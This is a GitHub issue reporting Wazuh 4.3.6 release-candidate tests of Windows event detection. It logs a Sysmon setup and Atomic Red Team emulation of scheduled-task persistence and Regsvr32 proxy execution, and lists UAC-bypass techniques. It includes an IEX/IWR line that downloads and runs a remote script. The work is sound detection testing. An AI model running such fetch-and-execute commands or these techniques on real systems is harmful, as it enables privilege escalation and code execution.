Release 4.3.6 - Release Candidate 1 - E2E UX tests - Windows events #3102

roronoasins · 2022-07-15T10:48:06Z

The following issue aims to run the specified test for the current release candidate, report the results, and open new issues for any encountered errors.

Test information


Test name	Windows events
Category	Log data analysis
Deployment option	AWS - Installation assistant
Main release issue	wazuh/wazuh#14260
OS	Windows Server 2022
Release candidate #	RC1

Test environments

4.3.5


`wazuh-indexer`	installation assistant	`Production`
`wazuh-server`	installation assistant	`Production`
`wazuh-dashboard`	installation assistant	`Production`
`wazuh-agent`	Wazuh WUI one-liner deploy with custom group	`Production`

4.3.6


`wazuh-indexer`	installation assistant	`Development`
`wazuh-server`	installation assistant	`Development`
`wazuh-dashboard`	installation assistant	`Development`
`wazuh-agent`	Wazuh WUI one-liner deploy with custom group	`Development`

Test description

Test that Windows data collection works out of the box.
Check that for the same Windows events, the alerts rule ID are the same as in previous version.
Install Sysmon and create Wazuh rules as mentioned, to ensure that everything works as intended in the blog post(using current release under test instead of 4.2.0)

Test report procedure

All test results must have one of the following statuses:


🟢	All checks passed.
🔴	There is at least one failed to check.
🟡	There is at least one expected to fail or skipped test and no failures.
🔵	In Progress
⚫	To Do

Any failing test must be properly addressed with a new issue, detailing the error and the possible cause.

An extended report of the test results must be attached as a zip or txt. Please attach any documents, screenshots or tables to the issue update with the results. This report can be used by the auditors to dig deeper into any possible failures and details.

Reported issues to review

Status	Issue	Description	Severity

Conclusions 🟡

All tests have been executed and the results can be found here.


Status	Test	Failure type	Notes
🟢	Test that Windows data collection works out of the box.
🟢	Install Sysmon and create Wazuh rules as mentioned, to ensure that everything works as intended in the blog post (using current release under test instead of 4.2.0)
🟡	Check that for the same Windows events, the alerts rule ID is the same as in previous versions.	wazuh/wazuh#12977	Issues were already reported in previous versions

All tests have passed and the fails have been reported or justified. I, therefore, conclude that this issue is finished and OK for this release candidate.

However, the events and rules have not changed since the previous check so the already reported issue persists:

Issues

Detected issues and previously reported

Critical severity Windows rules 60012 and 60015 never trigger if the event is classified by channel. wazuh#12977

Auditors' validation

The definition of done for this one is the validation of the conclusions and the test results from all auditors.

All checks from below must be accepted in order to close this issue.

The text was updated successfully, but these errors were encountered:

roronoasins · 2022-07-18T17:18:23Z

Emulation of ATT&CK techniques and detection with Wazuh

Setting up the lab environment

Sysmon configuration

Mapping Sysmon rules with MITRE attack techniques

PS C:\Users\Administrator\Downloads\Sysmon> .\Sysmon64.exe -accepteula -i sysmonconfig.xml
System Monitor v13.34 - System activity monitor
By Mark Russinovich and Thomas Garnier
Copyright (C) 2014-2022 Microsoft Corporation
Using libxml2. libxml2 is Copyright (C) 1998-2012 Daniel Veillard. All Rights Reserved.
Sysinternals - www.sysinternals.com

Loading configuration file with schema version 4.60
Sysmon schema version: 4.81
Configuration file validated.
Sysmon64 installed.
SysmonDrv installed.
Starting SysmonDrv.
SysmonDrv started.
Starting Sysmon64...
Sysmon64 started.

Atomic Red Team installation

ART Execution Framework and Atomics folder installation

PS C:\Users\Administrator\Downloads\Sysmon> IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
>> Install-AtomicRedTeam -getAtomics
NuGet provider is required to continue
PowerShellGet requires NuGet provider version '2.8.5.201' or newer to interact with NuGet-based repositories. The NuGet  provider must be available in 'C:\Program Files\PackageManagement\ProviderAssemblies' or                               'C:\Users\Administrator\AppData\Local\PackageManagement\ProviderAssemblies'. You can also install the NuGet provider by  running 'Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force'.
Do you want PowerShellGet to install   and import the NuGet provider now?
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): Y
Installation of Invoke-AtomicRedTeam is complete. You can now use the Invoke-AtomicTest function
See Wiki at https://github.com/redcanaryco/invoke-atomicredteam/wiki for complete details

Importing the ART module

PS C:\Users\Administrator\Downloads\Sysmon> Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force

Get details of a particular technique

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -ShowDetailsBrief
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
T1548.002-1 Bypass UAC using Event Viewer (cmd)
T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
T1548.002-3 Bypass UAC using Fodhelper
T1548.002-4 Bypass UAC using Fodhelper - PowerShell
T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
T1548.002-6 Bypass UAC by Mocking Trusted Directories
T1548.002-7 Bypass UAC using sdclt DelegateExecute
T1548.002-8 Disable UAC using reg.exe
T1548.002-9 Bypass UAC using SilentCleanup task
T1548.002-10 UACME Bypass Method 23
T1548.002-11 UACME Bypass Method 31
T1548.002-12 UACME Bypass Method 33
T1548.002-13 UACME Bypass Method 34
T1548.002-14 UACME Bypass Method 39
T1548.002-15 UACME Bypass Method 56
T1548.002-16 UACME Bypass Method 59
T1548.002-17 UACME Bypass Method 61
T1548.002-18 WinPwn - UAC Magic
T1548.002-19 WinPwn - UAC Bypass ccmstp technique
T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique

Check/Get prerequisites of a technique

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs                                   PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                                                                                                                                                  CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd)                                                      Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd)                                                      CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                               Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                               CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper                                                               Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper                                                               CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                                  Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                                  CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                                           Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                                           CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                                Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                                CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                                   Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                                   CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe                                                                Prerequisites met: T1548.002-8 Disable UAC using reg.exe                                                                CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task                                                      Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task                                                      CheckPrereq's for: T1548.002-10 UACME Bypass Method 23                                                                  Prerequisites not met: T1548.002-10 UACME Bypass Method 23                                                                      [*] UACME executable must exist on disk at specified location (%temp%\uacme\23 Akagi64.exe)                                                                                                                                             Try installing prereq's with the -GetPrereqs switch                                                                     CheckPrereq's for: T1548.002-11 UACME Bypass Method 31                                                                  Prerequisites not met: T1548.002-11 UACME Bypass Method 31                                                                      [*] UACME executable must exist on disk at specified location (%temp%\uacme\31 Akagi64.exe)                                                                                                                                             Try installing prereq's with the -GetPrereqs switch                                                                     CheckPrereq's for: T1548.002-12 UACME Bypass Method 33                                                                  Prerequisites not met: T1548.002-12 UACME Bypass Method 33                                                                      [*] UACME executable must exist on disk at specified location (%temp%\uacme\33 Akagi64.exe)                                                                                                                                             Try installing prereq's with the -GetPrereqs switch                                                                     CheckPrereq's for: T1548.002-13 UACME Bypass Method 34                                                                  Prerequisites not met: T1548.002-13 UACME Bypass Method 34                                                                      [*] UACME executable must exist on disk at specified location (%temp%\uacme\34 Akagi64.exe)                                                                                                                                             Try installing prereq's with the -GetPrereqs switch                                                                     CheckPrereq's for: T1548.002-14 UACME Bypass Method 39                                                                  Prerequisites not met: T1548.002-14 UACME Bypass Method 39                                                                      [*] UACME executable must exist on disk at specified location (%temp%\uacme\39 Akagi64.exe)                                                                                                                                             Try installing prereq's with the -GetPrereqs switch                                                                     CheckPrereq's for: T1548.002-15 UACME Bypass Method 56                                                                  Prerequisites not met: T1548.002-15 UACME Bypass Method 56
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\56 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-16 UACME Bypass Method 59
Prerequisites not met: T1548.002-16 UACME Bypass Method 59
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\59 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-17 UACME Bypass Method 61
Prerequisites not met: T1548.002-17 UACME Bypass Method 61
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\61 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic
Prerequisites met: T1548.002-18 WinPwn - UAC Magic
CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique

Run the test for a particular technique

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs                                                                                                                                             PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                                                                                                                                                                                                                                                                                                                                                                      CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd)                                                                                                                                                                Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd)                                                                                                                                                                CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                                                                                                                                         Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                                                                                                                                         CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper                                                                                                                                                                         Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper                                                                                                                                                                         CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                                                                                                                                            Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                                                                                                                                            CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                                                                                                                                                     Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                                                                                                                                                     CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                                                                                                                                          Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                                                                                                                                          CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                                                                                                                                             Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                                                                                                                                             CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe                                                                                                                                                                          Prerequisites met: T1548.002-8 Disable UAC using reg.exe                                                                                                                                                                          CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task                                                                                                                                                                Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task
CheckPrereq's for: T1548.002-10 UACME Bypass Method 23
Prerequisites not met: T1548.002-10 UACME Bypass Method 23
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\23 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-11 UACME Bypass Method 31
Prerequisites not met: T1548.002-11 UACME Bypass Method 31
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\31 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-12 UACME Bypass Method 33
Prerequisites not met: T1548.002-12 UACME Bypass Method 33
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\33 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-13 UACME Bypass Method 34
Prerequisites not met: T1548.002-13 UACME Bypass Method 34
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\34 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-14 UACME Bypass Method 39
Prerequisites not met: T1548.002-14 UACME Bypass Method 39
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\39 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-15 UACME Bypass Method 56
Prerequisites not met: T1548.002-15 UACME Bypass Method 56
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\56 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-16 UACME Bypass Method 59
Prerequisites not met: T1548.002-16 UACME Bypass Method 59
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\59 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-17 UACME Bypass Method 61
Prerequisites not met: T1548.002-17 UACME Bypass Method 61
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\61 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic
Prerequisites met: T1548.002-18 WinPwn - UAC Magic
CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique

Clean-up on completion of the test

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique

Attack emulation with ART

T1053.005 – Scheduled Task/Job 🟢

GetPrereqs

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1053.005 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1053.005-1 Scheduled Task Startup Script
No Preqs Defined
GetPrereq's for: T1053.005-2 Scheduled task Local
No Preqs Defined
GetPrereq's for: T1053.005-3 Scheduled task Remote
No Preqs Defined
GetPrereq's for: T1053.005-4 Powershell Cmdlet Scheduled Task
No Preqs Defined
GetPrereq's for: T1053.005-5 Task Scheduler via VBA
Attempting to satisfy prereq: Microsoft Word must be installed
You will need to install Microsoft Word manually to meet this requirement
Failed to meet prereq: Microsoft Word must be installed
GetPrereq's for: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
No Preqs Defined
GetPrereq's for: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
No Preqs Defined
GetPrereq's for: T1053.005-8 Import XML Schedule Task with Hidden Attribute
No Preqs Defined

Test run

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1053.005
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1053.005-1 Scheduled Task Startup Script
WARNING: The task name "T1053_005_OnLogon" already exists. Do you want to replace it (Y/N)? WARNING: The task name "T1053_005_OnStartup" already exists. Do you want to replace it (Y/N)?
Done executing test: T1053.005-1 Scheduled Task Startup Script
Executing test: T1053.005-2 Scheduled task Local
WARNING: The task name "spawn" already exists. Do you want to replace it (Y/N)?
Done executing test: T1053.005-2 Scheduled task Local
Executing test: T1053.005-3 Scheduled task Remote
ERROR: No mapping between account names and security IDs was done.
Done executing test: T1053.005-3 Scheduled task Remote
Executing test: T1053.005-4 Powershell Cmdlet Scheduled Task
Register-ScheduledTask : Cannot create a file when that file already exists.
At line:6 char:1
+ Register-ScheduledTask AtomicTask -InputObject $object}
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceExists: (PS_ScheduledTask:Root/Microsoft/...S_ScheduledTask) [Register-Scheduled
   Task], CimException
    + FullyQualifiedErrorId : HRESULT 0x800700b7,Register-ScheduledTask
Done executing test: T1053.005-4 Powershell Cmdlet Scheduled Task
Executing test: T1053.005-5 Task Scheduler via VBA
Done executing test: T1053.005-5 Task Scheduler via VBA
Executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
cmdletOutput                                                    ReturnValue PSComputerName
------------                                                    ----------- --------------
MSFT_ScheduledTask (TaskName = "T1053_005_WMI", TaskPath = "\")           0
Done executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
The operation completed successfully.
SUCCESS: The scheduled task "ATOMIC-T1053.005" has successfully been created.
Done executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
Executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
cmdletOutput                                                      ReturnValue PSComputerName
------------                                                      ----------- --------------
MSFT_ScheduledTask (TaskName = "atomic red team", TaskPath = "\")           0
Done executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute

Cleanup

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1053.005 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1053.005-1 Scheduled Task Startup Script
Done executing cleanup for test: T1053.005-1 Scheduled Task Startup Script
Executing cleanup for test: T1053.005-2 Scheduled task Local
Done executing cleanup for test: T1053.005-2 Scheduled task Local
Executing cleanup for test: T1053.005-3 Scheduled task Remote
Done executing cleanup for test: T1053.005-3 Scheduled task Remote
Executing cleanup for test: T1053.005-4 Powershell Cmdlet Scheduled Task
Done executing cleanup for test: T1053.005-4 Powershell Cmdlet Scheduled Task
Executing cleanup for test: T1053.005-5 Task Scheduler via VBA
Done executing cleanup for test: T1053.005-5 Task Scheduler via VBA
Executing cleanup for test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Done executing cleanup for test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Executing cleanup for test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
Done executing cleanup for test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
Executing cleanup for test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
Done executing cleanup for test: T1053.005-8 Import XML Schedule Task with Hidden Attribute

Event log

Rule: 115001 (level 10) -> 'A Newly Scheduled Task has been Detected on EC2AMAZ-3188I1R'
{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","eventID":"7","version":"3","level":"4","task":"7","opcode":"0","keywords":"0x8000000000000000","systemTime":"2022-07-18T15:17:32.8101722Z","eventRecordID":"6086","processID":"4508","threadID":"92","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","severityValue":"INFORMATION","message":"\"Image loaded:\r\nRuleName: technique_id=T1053,technique_name=Scheduled Task\r\nUtcTime: 2022-07-18 15:17:32.797\r\nProcessGuid: {a64f3178-798c-62d5-2f05-000000009000}\r\nProcessId: 3056\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nImageLoaded: C:\\Windows\\System32\\taskschd.dll\r\nFileVersion: 10.0.20348.1 (WinBuild.160101.0800)\r\nDescription: Task Scheduler COM API\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: taskschd.dll\r\nHashes: SHA1=F7151ED9C53B2095B2FF1294971C63C6F4739167,MD5=1A49668C0AD5E92F0CEF9F0EF99607A9,SHA256=98920100ECE3236CB579E24DB926CA66ACB05F7018F85DD9C40C1865F86D9041,IMPHASH=530A68E05D91DD5F4F3210E15EFA9CB5\r\nSigned: true\r\nSignature: Microsoft Windows\r\nSignatureStatus: Valid\r\nUser: EC2AMAZ-3188I1R\\Administrator\""},"eventdata":{"ruleName":"technique_id=T1053,technique_name=Scheduled Task","utcTime":"2022-07-18 15:17:32.797","processGuid":"{a64f3178-798c-62d5-2f05-000000009000}","processId":"3056","image":"C:\\\\Windows\\\\System32\\\\schtasks.exe","imageLoaded":"C:\\\\Windows\\\\System32\\\\taskschd.dll","fileVersion":"10.0.20348.1 (WinBuild.160101.0800)","description":"Task Scheduler COM API","product":"Microsoft® Windows® Operating System","company":"Microsoft Corporation","originalFileName":"taskschd.dll","hashes":"SHA1=F7151ED9C53B2095B2FF1294971C63C6F4739167,MD5=1A49668C0AD5E92F0CEF9F0EF99607A9,SHA256=98920100ECE3236CB579E24DB926CA66ACB05F7018F85DD9C40C1865F86D9041,IMPHASH=530A68E05D91DD5F4F3210E15EFA9CB5","signed":"true","signature":"Microsoft Windows","signatureStatus":"Valid","user":"EC2AMAZ-3188I1R\\\\Administrator"}}}

Dashboard event entry

T1218.010 – Signed Binary Proxy Execution: Regsvr32 🟢

GetPrereqs

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1218.010 -GetPrereqs                                     PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                          
GetPrereq's for: T1218.010-1 Regsvr32 local COM scriptlet execution
Attempting to satisfy prereq: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct)
Prereq successfully met: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct)
GetPrereq's for: T1218.010-2 Regsvr32 remote COM scriptlet execution
No Preqs Defined
GetPrereq's for: T1218.010-3 Regsvr32 local DLL execution
Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
Prereq successfully met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
GetPrereq's for: T1218.010-4 Regsvr32 Registering Non DLL
Attempting to satisfy prereq: Test requires a renamed dll file
1 file(s) copied.
Prereq successfully met: Test requires a renamed dll file
GetPrereq's for: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
Prereq already met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)

Test run

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1218.010
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1218.010-1 Regsvr32 local COM scriptlet execution
Done executing test: T1218.010-1 Regsvr32 local COM scriptlet execution
Executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Exception calling "Start" with "0" argument(s): "Access is denied"
At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:46 char:17
+                 $process.Start() > $null
+                 ~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : Win32Exception

Done executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Executing test: T1218.010-3 Regsvr32 local DLL execution
Done executing test: T1218.010-3 Regsvr32 local DLL execution
Executing test: T1218.010-4 Regsvr32 Registering Non DLL
Done executing test: T1218.010-4 Regsvr32 Registering Non DLL
Executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Done executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer

Cleanup

PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1218.010 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution
Done executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution
Executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Done executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution
Done executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution
Executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL
Done executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL
Executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Done executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer

Event log

RuleName: technique_id=T1218.010,technique_name=Regsvr32
win.eventdata.ruleName: technique_id=T1218.010,technique_name=Regsvr32
{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","eventID":"7","version":"3","level":"4","task":"7","opcode":"0","keywords":"0x8000000000000000","systemTime":"2022-07-18T16:26:31.9219508Z","eventRecordID":"8823","processID":"4508","threadID":"92","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","severityValue":"INFORMATION","message":"\"Image loaded:\r\nRuleName: technique_id=T1218.010,technique_name=Regsvr32\r\nUtcTime: 2022-07-18 16:26:31.907\r\nProcessGuid: {a64f3178-89b7-62d5-7f06-000000009000}\r\nProcessId: 5496\r\nImage: C:\\Windows\\System32\\regsvr32.exe\r\nImageLoaded: C:\\Windows\\System32\\scrobj.dll\r\nFileVersion: 5.812.10240.16384\r\nDescription: Windows ® Script Component Runtime\r\nProduct: Microsoft ® Windows ® Script Component Runtime\r\nCompany: Microsoft Corporation\r\nOriginalFileName: scrobj.dll\r\nHashes: SHA1=BAFFA3B8D2012F2A84278994CECD877B3364CE93,MD5=06CC2FB88C5DA8B13E6A31B3F6C6A0D5,SHA256=0D7AE861D31EFC7E2965DDE5074A906051B2814DD201B4A334ED2358245AEB97,IMPHASH=91B5CDDA29C7F7E7003EC3E46D9028BC\r\nSigned: true\r\nSignature: Microsoft Windows\r\nSignatureStatus: Valid\r\nUser: EC2AMAZ-3188I1R\\Administrator\""},"eventdata":{"ruleName":"technique_id=T1218.010,technique_name=Regsvr32","utcTime":"2022-07-18 16:26:31.907","processGuid":"{a64f3178-89b7-62d5-7f06-000000009000}","processId":"5496","image":"C:\\\\Windows\\\\System32\\\\regsvr32.exe","imageLoaded":"C:\\\\Windows\\\\System32\\\\scrobj.dll","fileVersion":"5.812.10240.16384","description":"Windows ® Script Component Runtime","product":"Microsoft ® Windows ® Script Component Runtime","company":"Microsoft 